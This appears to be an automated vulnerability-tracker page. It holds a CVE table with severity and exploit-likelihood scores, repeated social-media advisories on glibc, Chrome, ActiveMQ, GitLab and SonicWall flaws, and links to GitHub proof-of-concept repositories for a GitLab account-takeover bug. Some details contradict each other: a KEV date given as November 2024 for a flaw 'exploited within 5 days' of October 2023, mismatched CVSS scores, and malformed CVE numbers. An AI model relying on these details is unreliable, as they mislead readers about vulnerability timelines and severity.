##
Updated at UTC 2024-05-04T13:12:21.798812
CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
---|---|---|---|---|---|---|---|
CVE-2024-2961 | None | 0.04% | 13 | 1 | 2024-05-04T03:30:45 | The iconv() function in the GNU C Library versions 2.39 and older may overflow t | |
CVE-2024-4368 | 0 | 0.04% | 4 | 0 | 2024-05-04T02:15:06.853000 | Use after free in Dawn in Google Chrome prior to 124.0.6367.118 allowed a remote | |
CVE-2024-4331 | 0 | 0.04% | 4 | 0 | 2024-05-04T02:15:06.800000 | Use after free in Picture In Picture in Google Chrome prior to 124.0.6367.118 al | |
CVE-2024-32114 | 8.5 | 0.04% | 2 | 0 | 2024-05-03T17:47:08 | In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web con | |
CVE-2024-4060 | 0 | 0.04% | 1 | 0 | 2024-05-03T04:15:09.620000 | Use after free in Dawn in Google Chrome prior to 124.0.6367.78 allowed a remote | |
CVE-2024-4059 | 0 | 0.04% | 1 | 0 | 2024-05-03T03:16:29.430000 | Out of bounds read in V8 API in Google Chrome prior to 124.0.6367.78 allowed a r | |
CVE-2024-4058 | 0 | 0.04% | 1 | 0 | 2024-05-03T03:16:29.387000 | Type confusion in ANGLE in Google Chrome prior to 124.0.6367.78 allowed a remote | |
CVE-2023-48795 | 5.9 | 96.23% | 2 | 1 | template | 2024-05-02T13:18:40 | ### Summary Terrapin is a prefix truncation attack targeting the SSH protocol. |
CVE-2023-7028 | 7.5 | 95.38% | 8 | 11 | template | 2024-05-02T01:00:01.640000 | An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 pr |
CVE-2024-29011 | 7.5 | 0.04% | 4 | 0 | 2024-05-01T21:30:46 | Use of hard-coded password in the GMS ECM endpoint leading to authentication byp | |
CVE-2024-26305 | 9.8 | 0.04% | 12 | 0 | 2024-05-01T19:50:25.633000 | There is a buffer overflow vulnerability in the underlying Utility daemon that c | |
CVE-2024-20357 | 5.9 | 0.04% | 4 | 0 | 2024-05-01T19:50:25.633000 | A vulnerability in the XML service of Cisco IP Phone firmware could allow an una | |
CVE-2024-20376 | 7.5 | 0.04% | 4 | 0 | 2024-05-01T18:31:25 | A vulnerability in the web-based management interface of Cisco IP Phone firmware | |
CVE-2024-29010 | 7.1 | 0.04% | 4 | 0 | 2024-05-01T18:31:20 | The XML document processed in the GMS ECM URL endpoint is vulnerable to XML exte | |
CVE-2024-20378 | 7.5 | 0.04% | 4 | 0 | 2024-05-01T18:31:19 | A vulnerability in the web-based management interface of Cisco IP Phone firmware | |
CVE-2024-32462 | 8.4 | 0.04% | 2 | 0 | 2024-05-01T18:15:24.140000 | Flatpak is a system for building, distributing, and running sandboxed desktop ap | |
CVE-2024-1086 | 7.8 | 0.04% | 1 | 3 | 2024-05-01T18:15:13.200000 | A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables compon | |
CVE-2024-33511 | 9.8 | 0.04% | 8 | 0 | 2024-05-01T15:30:44 | There is a buffer overflow vulnerability in the underlying Automatic Reporting s | |
CVE-2024-33512 | 9.8 | 0.04% | 4 | 0 | 2024-05-01T15:30:44 | There is a buffer overflow vulnerability in the underlying Local User Authentica | |
CVE-2024-26304 | 9.8 | 0.04% | 2 | 1 | 2024-05-01T15:30:37 | There is a buffer overflow vulnerability in the underlying L2/L3 Management serv | |
CVE-2024-27322 | 8.8 | 0.04% | 28 | 0 | 2024-04-29T21:30:34 | Deserialization of untrusted data can occur in the R statistical programming lan | |
CVE-2024-27956 | 9.9 | 0.05% | 1 | 3 | template | 2024-04-29T09:31:52 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti |
CVE-2024-27124 | 7.5 | 0.04% | 2 | 0 | 2024-04-26T15:32:22.523000 | An OS command injection vulnerability has been reported to affect several QNAP o | |
CVE-2024-32764 | 9.9 | 0.04% | 2 | 0 | 2024-04-26T15:32:22.523000 | A missing authentication for critical function vulnerability has been reported t | |
CVE-2024-32766 | 10.0 | 0.04% | 2 | 1 | 2024-04-26T15:30:39 | An OS command injection vulnerability has been reported to affect several QNAP o | |
CVE-2024-4040 | 10.0 | 1.60% | 27 | 9 | 2024-04-26T15:25:47.270000 | A server side template injection vulnerability in CrushFTP in all versions befor | |
CVE-2024-20359 | 6.0 | 0.13% | 54 | 2 | 2024-04-26T15:25:02.773000 | A vulnerability in a legacy capability that allowed for the preloading of VPN cl | |
CVE-2024-20353 | 8.6 | 0.35% | 52 | 2 | 2024-04-26T15:22:27.803000 | A vulnerability in the management and VPN web servers for Cisco Adaptive Securit | |
CVE-2024-4006 | 4.3 | 0.04% | 2 | 0 | 2024-04-25T17:25:05.903000 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro | |
CVE-2024-4024 | 7.3 | 0.04% | 2 | 0 | 2024-04-25T15:30:38 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro | |
CVE-2024-2434 | 8.5 | 0.04% | 2 | 0 | 2024-04-25T13:18:02.660000 | An issue has been discovered in GitLab affecting all versions of GitLab CE/EE 1 | |
CVE-2024-1347 | 4.3 | 0.04% | 2 | 0 | 2024-04-25T12:30:56 | An issue has been discovered in GitLab CE/EE affecting all versions before 16.9. | |
CVE-2024-2829 | 7.5 | 0.04% | 2 | 0 | 2024-04-25T12:30:51 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro | |
CVE-2024-20358 | 6.0 | 0.04% | 4 | 0 | 2024-04-24T21:31:56 | A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functiona | |
CVE-2024-20356 | 8.7 | 0.04% | 6 | 1 | 2024-04-24T21:31:56 | A vulnerability in the web-based management interface of Cisco Integrated Manage | |
CVE-2024-3400 | 10.0 | 95.36% | 39 | 33 | template | 2024-04-23T19:57:25.207000 | A command injection as a result of arbitrary file creation vulnerability in the |
CVE-2024-29003 | 7.5 | 0.04% | 1 | 0 | 2024-04-23T15:30:35 | The SolarWinds Platform was susceptible to a XSS vulnerability that affects the | |
CVE-2024-1480 | 7.5 | 0.04% | 4 | 0 | 2024-04-22T13:28:43.747000 | Unitronics Vision Standard line of controllers allow the Information Mode passwo | |
CVE-2024-28076 | 7.0 | 0.07% | 2 | 0 | 2024-04-19T14:15:11.080000 | The SolarWinds Platform was susceptible to a Arbitrary Open Redirection Vulnerab | |
CVE-2024-29001 | 7.5 | 0.04% | 1 | 0 | 2024-04-18T09:30:53 | A SolarWinds Platform SWQL Injection Vulnerability was identified in the user in | |
CVE-2024-28073 | 8.5 | 0.04% | 1 | 0 | 2024-04-17T18:31:37 | SolarWinds Serv-U was found to be susceptible to a Directory Traversal Remote Co | |
CVE-2024-22354 | 7.0 | 0.04% | 2 | 0 | 2024-04-17T03:30:48 | IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server | |
CVE-2024-21111 | 7.8 | 0.04% | 4 | 1 | 2024-04-17T00:31:31 | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (comp | |
CVE-2024-31497 | None | 0.05% | 4 | 2 | 2024-04-17T00:31:29 | In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an | |
CVE-2024-1135 | 8.2 | 0.04% | 2 | 0 | 2024-04-16T23:24:40 | Gunicorn fails to properly validate Transfer-Encoding headers, leading to HTTP R | |
CVE-2024-3272 | 9.8 | 1.27% | 4 | 1 | 2024-04-15T20:14:55.570000 | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very cr | |
CVE-2024-2279 | 8.7 | 0.04% | 2 | 0 | 2024-04-12T03:30:44 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro | |
CVE-2024-3651 | 6.2 | 0.00% | 2 | 0 | 2024-04-11T21:32:40 | ### Impact A specially crafted argument to the `idna.encode()` function could co | |
CVE-2024-26198 | 8.8 | 0.53% | 2 | 0 | 2024-04-11T21:30:50 | Microsoft Exchange Server Remote Code Execution Vulnerability | |
CVE-2023-41266 | 8.2 | 85.11% | 2 | 1 | template | 2024-04-11T21:06:16 | A path traversal vulnerability found in Qlik Sense Enterprise for Windows for ve |
CVE-2024-2604 | 6.3 | 0.04% | 4 | 0 | 2024-04-11T01:25:29.777000 | A vulnerability was found in SourceCodester File Manager App 1.0. It has been de | |
CVE-2024-26218 | 7.8 | 0.04% | 6 | 1 | 2024-04-10T13:24:00.070000 | Windows Kernel Elevation of Privilege Vulnerability | |
CVE-2024-2957 | 7.2 | 0.04% | 2 | 0 | 2024-04-09T21:32:08 | The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulne | |
CVE-2024-29988 | 8.8 | 0.46% | 2 | 1 | 2024-04-09T18:30:28 | SmartScreen Prompt Security Feature Bypass Vulnerability | |
CVE-2023-42931 | 7.8 | 0.04% | 2 | 1 | 2024-04-08T22:47:13.533000 | The issue was addressed with improved checks. This issue is fixed in macOS Ventu | |
CVE-2024-3273 | 7.3 | 83.36% | 2 | 8 | template | 2024-04-07T15:30:32 | A vulnerability, which was classified as critical, was found in D-Link DNS-320L, |
CVE-2023-41265 | 9.6 | 87.59% | 2 | 1 | template | 2024-04-04T07:16:03 | An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windo |
CVE-2023-34362 | 9.8 | 95.56% | 2 | 9 | template | 2024-04-04T04:29:06 | In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0. |
CVE-2023-24932 | 6.7 | 13.87% | 2 | 1 | 2024-04-04T03:56:20 | Secure Boot Security Feature Bypass Vulnerability | |
CVE-2023-24796 | 9.8 | 0.33% | 2 | 0 | 2024-04-04T03:41:35 | Password vulnerability found in Vinga WR-AC1200 81.102.1.4370 and before allows | |
CVE-2024-2389 | 10.0 | 0.44% | 15 | 26 | template | 2024-04-02T15:30:43 | In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command inj |
CVE-2023-44487 | 5.3 | 73.93% | 2 | 12 | 2024-04-01T16:13:53 | ## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to t | |
CVE-2024-3128 | 2.4 | 0.04% | 1 | 0 | 2024-04-01T15:30:38 | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problem | |
CVE-2024-3094 | 10.0 | 10.08% | 5 | 60 | template | 2024-03-29T18:30:50 | Malicious code was discovered in the upstream tarballs of xz, starting with vers |
CVE-2024-2887 | None | 0.04% | 4 | 0 | 2024-03-29T06:30:30 | Type Confusion in WebAssembly in Google Chrome prior to 123.0.6312.86 allowed a | |
CVE-2023-48788 | 9.8 | 56.22% | 4 | 1 | 2024-03-26T01:00:02.003000 | A improper neutralization of special elements used in an sql command ('sql injec | |
CVE-2024-27198 | 9.8 | 97.24% | 2 | 9 | template | 2024-03-21T05:01:12 | In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform |
CVE-2024-21899 | 9.8 | 0.09% | 2 | 0 | 2024-03-13T14:25:02.043000 | An improper authentication vulnerability has been reported to affect several QNA | |
CVE-2024-21901 | 4.7 | 0.04% | 2 | 0 | 2024-03-08T18:30:35 | A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploi | |
CVE-2024-21900 | 4.3 | 0.05% | 2 | 0 | 2024-03-08T18:30:35 | An injection vulnerability has been reported to affect several QNAP operating sy | |
CVE-2024-20345 | 6.5 | 0.04% | 2 | 0 | 2024-03-07T13:52:27.110000 | A vulnerability in the file upload functionality of Cisco AppDynamics Controller | |
CVE-2024-1708 | 8.5 | 0.05% | 2 | 2 | 2024-02-22T15:30:39 | ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner | |
CVE-2024-1212 | 10.0 | 0.21% | 4 | 1 | template | 2024-02-21T18:31:06 | Unauthenticated remote attackers can access the system through the LoadMaster ma |
CVE-2023-50386 | 8.8 | 87.24% | 2 | 1 | 2024-02-15T18:40:48.837000 | Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of F | |
CVE-2024-21893 | 8.2 | 96.30% | 2 | 4 | template | 2024-02-09T05:11:32 | A server-side request forgery vulnerability in the SAML component of Ivanti Conn |
CVE-2023-20198 | 10.0 | 87.33% | 2 | 28 | template | 2024-02-03T05:07:29 | Cisco is aware of active exploitation of a previously unknown vulnerability in t |
CVE-2024-0204 | 9.8 | 53.86% | 2 | 6 | template | 2024-02-02T18:30:29 | Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauth |
CVE-2024-21887 | 9.1 | 97.33% | 2 | 12 | template | 2024-01-22T17:15:09.523000 | A command injection vulnerability in web components of Ivanti Connect Secure (9. |
CVE-2023-46805 | 8.2 | 96.56% | 2 | 8 | template | 2024-01-22T17:15:09.080000 | An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 2 |
CVE-2021-26887 | 7.8 | 0.06% | 2 | 0 | 2023-12-29T20:15:55.393000 | An elevation of privilege vulnerability exists in Microsoft Windows when Fold |
|
CVE-2023-6448 | 9.8 | 6.84% | 2 | 0 | 2023-12-19T15:30:29 | Unitronics Vision Series PLCs and HMIs use default administrative passwords. An | |
CVE-2023-48365 | 9.6 | 0.08% | 2 | 0 | 2023-12-08T05:05:23 | Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthentica | |
CVE-2023-4474 | 9.8 | 0.10% | 5 | 0 | 2023-12-06T02:15:07.187000 | The improper neutralization of special elements in the WSGI server of the Zyxel | |
CVE-2023-4473 | 9.8 | 0.07% | 5 | 0 | 2023-12-06T02:15:07.063000 | A command injection vulnerability in the web server of the Zyxel NAS326 firmware | |
CVE-2023-46604 | 10.0 | 97.27% | 2 | 26 | template | 2023-11-28T22:24:39 | Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may all |
CVE-2023-36396 | 7.8 | 0.11% | 2 | 0 | 2023-11-20T18:04:21.453000 | Windows Compressed Folder Remote Code Execution Vulnerability | |
CVE-2021-44228 | 10.0 | 97.56% | 2 | 100 | template | 2023-11-07T03:39:36.897000 | Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12 |
CVE-2014-0160 | 7.5 | 97.48% | 2 | 65 | 2023-11-07T02:18:10.590000 | The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not p | |
CVE-2020-29583 | 9.8 | 96.25% | 2 | 1 | template | 2023-11-05T05:04:43 | Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyf |
CVE-2023-38831 | 7.8 | 35.46% | 4 | 43 | 2023-10-23T01:15:07.550000 | RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user | |
CVE-2020-3259 | 7.5 | 1.93% | 2 | 0 | 2023-08-16T18:30:19 | A vulnerability in the web services interface of Cisco Adaptive Security Applian | |
CVE-2023-1389 | 8.8 | 6.88% | 1 | 2 | 2023-08-11T15:15:09.760000 | TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 conta | |
CVE-2021-26085 | 5.3 | 96.32% | 4 | 2 | template | 2023-08-08T14:22:24.967000 | Affected versions of Atlassian Confluence Server allow remote attackers to view |
CVE-2023-32054 | 7.3 | 0.04% | 2 | 0 | 2023-07-13T19:55:55.293000 | Volume Shadow Copy Elevation of Privilege Vulnerability | |
CVE-2023-21746 | 7.8 | 0.04% | 2 | 1 | 2023-04-27T19:15:14.917000 | Windows NTLM Elevation of Privilege Vulnerability | |
CVE-2015-2051 | 0 | 97.14% | 6 | 0 | 2023-04-26T19:27:52.350000 | The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earli | |
CVE-2022-37955 | 7.8 | 0.06% | 2 | 0 | 2023-04-11T21:15:13.240000 | Windows Group Policy Elevation of Privilege Vulnerability | |
CVE-2023-21036 | 5.5 | 0.04% | 1 | 6 | 2023-04-06T05:08:38 | In BitmapExport.java, there is a possible failure to truncate images due to a lo | |
CVE-2023-23397 | 9.8 | 92.64% | 4 | 29 | 2023-03-29T05:07:23 | Microsoft Outlook Elevation of Privilege Vulnerability | |
CVE-2022-38028 | 7.8 | 0.05% | 15 | 0 | 2023-02-03T05:02:37 | Windows Print Spooler Elevation of Privilege Vulnerability. | |
CVE-2017-8570 | 7.8 | 97.34% | 4 | 9 | 2023-02-02T05:01:39 | Microsoft Office allows a remote code execution vulnerability due to the way tha | |
CVE-2021-3129 | 9.8 | 97.46% | 2 | 28 | template | 2023-02-01T05:05:19 | Ignition before 2.5.2, as used in Laravel and other products, allows unauthentic |
CVE-2006-4304 | None | 6.64% | 4 | 0 | 2023-02-01T05:01:22 | Buffer overflow in the sppp driver in FreeBSD 4.11 through 6.1, NetBSD 2.0 throu | |
CVE-2020-8657 | None | 16.36% | 2 | 0 | 2023-01-29T05:01:16 | An issue was discovered in EyesOfNetwork 5.3. The installation uses the same API | |
CVE-2022-26138 | 9.8 | 97.21% | 2 | 4 | template | 2023-01-27T05:06:26 | The Atlassian Questions For Confluence app for Confluence Server and Data Center |
CVE-2021-21975 | 7.5 | 97.40% | 4 | 10 | template | 2022-02-01T17:45:43.750000 | Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) |
CVE-2018-13379 | 9.8 | 97.41% | 4 | 12 | template | 2021-06-03T11:15:08.307000 | An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal" |
CVE-2024-28189 | 0 | 0.04% | 6 | 0 | N/A | ||
CVE-2024-29021 | 0 | 0.04% | 6 | 0 | N/A | ||
CVE-2024-33599 | 0 | 0.00% | 8 | 0 | N/A | ||
CVE-2024-33600 | 0 | 0.00% | 8 | 0 | N/A | ||
CVE-2024-33601 | 0 | 0.00% | 8 | 0 | N/A | ||
CVE-2024-33602 | 0 | 0.00% | 8 | 0 | N/A | ||
CVE-2024-28185 | 0 | 0.04% | 4 | 0 | N/A | ||
CVE-2023-3824 | 0 | 0.08% | 2 | 2 | N/A | ||
CVE-2024-202353 | 0 | 0.00% | 2 | 0 | N/A | ||
CVE-2024-202359 | 0 | 0.00% | 2 | 0 | N/A | ||
CVE-2024-27282 | 0 | 0.00% | 3 | 0 | N/A | ||
CVE-2024-32657 | 0 | 0.04% | 2 | 0 | N/A | ||
CVE-2023-42757 | 0 | 0.00% | 2 | 0 | N/A |
updated 2024-05-04T03:30:45
13 posts
1 repos
CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately https://securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/
##glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.
- https://www.openwall.com/lists/oss-security/2024/04/18/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
- https://rockylinux.org/news/glibc-vulnerability-april-2024/
A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.
Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:
##There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability https://youtu.be/u8jLUjpCWrs?si=Fm1JSBdAW9VBzuhj #cve #vulnerability #hacking #php #linux #news #Security
##CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately https://securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/
##glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.
- https://www.openwall.com/lists/oss-security/2024/04/18/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
- https://rockylinux.org/news/glibc-vulnerability-april-2024/
A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.
Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:
##There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability https://youtu.be/u8jLUjpCWrs?si=Fm1JSBdAW9VBzuhj #cve #vulnerability #hacking #php #linux #news #Security
##tl;dr: upgrade glibc on your servers!
Summing it up, there's a vulnerability (CVE-2024-2961) on glibc that, apparently, can be used to get RCE on servers running PHP.
It's recommended that you update glibc to a patched version.
https://security-tracker.debian.org/tracker/CVE-2024-2961
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2024-2961
There's an upcoming talk on May 10 where the researcher will explain how it was used to hack PHP servers.
##@ramsey it's this one CVE-2024-2961 https://security-tracker.debian.org/tracker/CVE-2024-2961
##"No way to prevent this" say users of only language where this regularly happens
https://xeiaso.net/shitposts/no-way-to-prevent-this/CVE-2024-2961/
##updated 2024-05-04T02:15:06.853000
4 posts
Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##updated 2024-05-04T02:15:06.800000
4 posts
Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##Google Chrome security advisory: Stable Channel Update for Desktop
2 vulnerabilities, both externally reported. No mention of exploitation.
#Chrome #Google #vulnerability #PatchTuesday #CVE_2024_4331 #CVE_2024_4368
##updated 2024-05-03T17:47:08
2 posts
Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)
See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114
Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.
Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)
See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114
Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.
updated 2024-05-03T04:15:09.620000
1 posts
Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html
#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060
##updated 2024-05-03T03:16:29.430000
1 posts
Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html
#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060
##updated 2024-05-03T03:16:29.387000
1 posts
Google Chrome security advisory: 4 security fixes, 3 externally reported. No mention of exploitation: 🔗 https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_24.html
#Google #Chrome #vulnerability #PatchTuesday #CVE_2024_4058 #CVE_2024_4059 #CVE_2024_4060
##updated 2024-05-02T13:18:40
2 posts
1 repos
Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 https://www.jenkins.io/security/advisory/2024-04-17/
##Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 https://www.jenkins.io/security/advisory/2024-04-17/
##updated 2024-05-02T01:00:01.640000
8 posts
11 repos
https://github.com/yoryio/CVE-2023-7028
https://github.com/thanhlam-attt/CVE-2023-7028
https://github.com/hackeremmen/gitlab-exploit
https://github.com/Trackflaw/CVE-2023-7028-Docker
https://github.com/Vozec/CVE-2023-7028
https://github.com/RandomRobbieBF/CVE-2023-7028
https://github.com/V1lu0/CVE-2023-7028
https://github.com/Esonhugh/gitlab_honeypot
https://github.com/mochammadrafi/CVE-2023-7028
https://github.com/Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab
The U.S. Cybersecurity and Infrastructure Security Agency (#CISA) warns #GitLab users of a 100-day-old, maximum severity vulnerability.
#CVE20237028 has a perfect CVSS score of 10. In #SBBlogwatch, we double-check our versions. At @TechstrongGroup’s @SecurityBlvd: https://securityboulevard.com/2024/05/gitlab-cvss-10-cisa-richixbw/?utm_source=richisoc&utm_medium=social&utm_content=richisoc&utm_campaign=richisoc
##CISA: CISA Adds One Known Exploited Vulnerability to Catalog
HOT OFF THE PRESS! CISA adds CVE-2023-7028 (10.0 critical, disclosed 12 January 2024 by GitLab) GitLab Community and Enterprise Editions Improper Access Control Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog!
Why you should care about CVE-2023-7028:
This is a zero-click account takeover that people were freaking out about less than 4 months ago. Successful exploitation allows attackers to send password reset emails for a targeted account to an attacker-controlled email address, allowing the threat actor to change the password and take over the account.
cc: @campuscodi @serghei @todb
#kev #eitw #knownexploitedvulnerabilitiescatalog #vulnerability #CVE_2023_7028
##CISA: CISA Adds One Known Exploited Vulnerability to Catalog
HOT OFF THE PRESS! CISA adds CVE-2023-7028 (10.0 critical, disclosed 12 January 2024 by GitLab) GitLab Community and Enterprise Editions Improper Access Control Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog!
Why you should care about CVE-2023-7028:
This is a zero-click account takeover that people were freaking out about less than 4 months ago. Successful exploitation allows attackers to send password reset emails for a targeted account to an attacker-controlled email address, allowing the threat actor to change the password and take over the account.
cc: @campuscodi @serghei @todb
#kev #eitw #knownexploitedvulnerabilitiescatalog #vulnerability #CVE_2023_7028
##GitLab Password Reset Vulnerability (CVE-2023-7028) https://fortiguard.fortinet.com/threat-signal-report/5433
##Related: "CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability"
"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw impacting #GitLab to its Known Exploited Vulnerabilities (KEV) catalog, owing to active exploitation in the wild.
Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email address."
👇
https://thehackernews.com/2024/05/cisa-warns-of-active-exploitation-of.html
# CISA Adds CVE-2023-7028 - #GitLab Community and Enterprise Editions Improper Access Control Vulnerability to Catalog #cybersecurity #infosec https://www.cisa.gov/news-events/alerts/2024/05/01/cisa-adds-one-known-exploited-vulnerability-catalog @cisacyber
##Related: "CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability"
"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw impacting #GitLab to its Known Exploited Vulnerabilities (KEV) catalog, owing to active exploitation in the wild.
Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email address."
👇
https://thehackernews.com/2024/05/cisa-warns-of-active-exploitation-of.html
# CISA Adds CVE-2023-7028 - #GitLab Community and Enterprise Editions Improper Access Control Vulnerability to Catalog #cybersecurity #infosec https://www.cisa.gov/news-events/alerts/2024/05/01/cisa-adds-one-known-exploited-vulnerability-catalog @cisacyber
##updated 2024-05-01T21:30:46
4 posts
SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
